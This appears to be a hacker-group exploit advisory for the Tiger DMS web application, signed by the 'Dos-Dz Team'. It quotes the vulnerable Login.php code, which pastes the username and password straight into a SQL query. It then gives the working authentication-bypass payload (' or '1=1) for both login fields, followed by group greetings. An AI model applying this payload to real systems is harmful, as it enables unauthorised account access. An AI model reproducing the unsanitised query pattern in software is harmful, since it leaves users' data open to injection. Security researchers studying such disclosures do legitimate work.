Tiger DMS SQL Injection

`==============================================================================  
DDDDD OOOO SSSS DDDD ZZZZZZ TTTTTTTTT EEEEE A MM MM  
D D o O S D D Z T E A A M M M M  
D D o o SSSS [**] D D Z T EEEEE AAAAA M M M  
D D o o S D D Z T E A A M M  
DDDD oooO SSSS DDDD ZZZZZZ T EEEEE A A M M  
==============================================================================  
-------------------------------------[+]  
Home:http://www.tigerdms.com/download.php  
Product: Tiger DMS   
home:www.h4ckf0ru.com  
Note: I test it On Localhost Because ThE Demo is not Worked :)  
  
-------------------------------------  
Tiger DMS (auth Bypass) SQL Injection Vulnerabilities  
-------------------------------------  
File:  
-----  
Login.php  
  
  
Vuln:  
----  
if (isset($r_username)){  
$selog = mysql_query("SELECT * FROM $prefix"."users where username='$r_username' and password='$r_password'");  
$num_rows = mysql_num_rows($selog);  
if ($num_rows == 1){  
$nona=mysql_fetch_array($selog);  
$_SESSION["aut"] = $nona["type"] ;  
$_SESSION["nick"] = $nona["username"];  
$_SESSION["name"] = $nona["name"];  
$_SESSION["id"] = $nona["id"];  
header("Location: index.php");  
  
exploit:  
--------  
  
http://localhost/[path]/login.php  
  
username:' or '1=1  
  
Password:' or '1=1  
  
  
--------------------------------------------------  
Greetz to :  
[+] Super_Cristal (My Master) Dos-Dz Team Snakes TeaM  
SuB-ZeRo x.CJP.x Mr.tro0oqy - Cyber-Zone- ZoRLu -ViRuS_Dz  
And ALL Members Of anti-intruders.org   
ALL My Friends (Dz)  
[+]-------------------------------------[+]   
  
  
  
`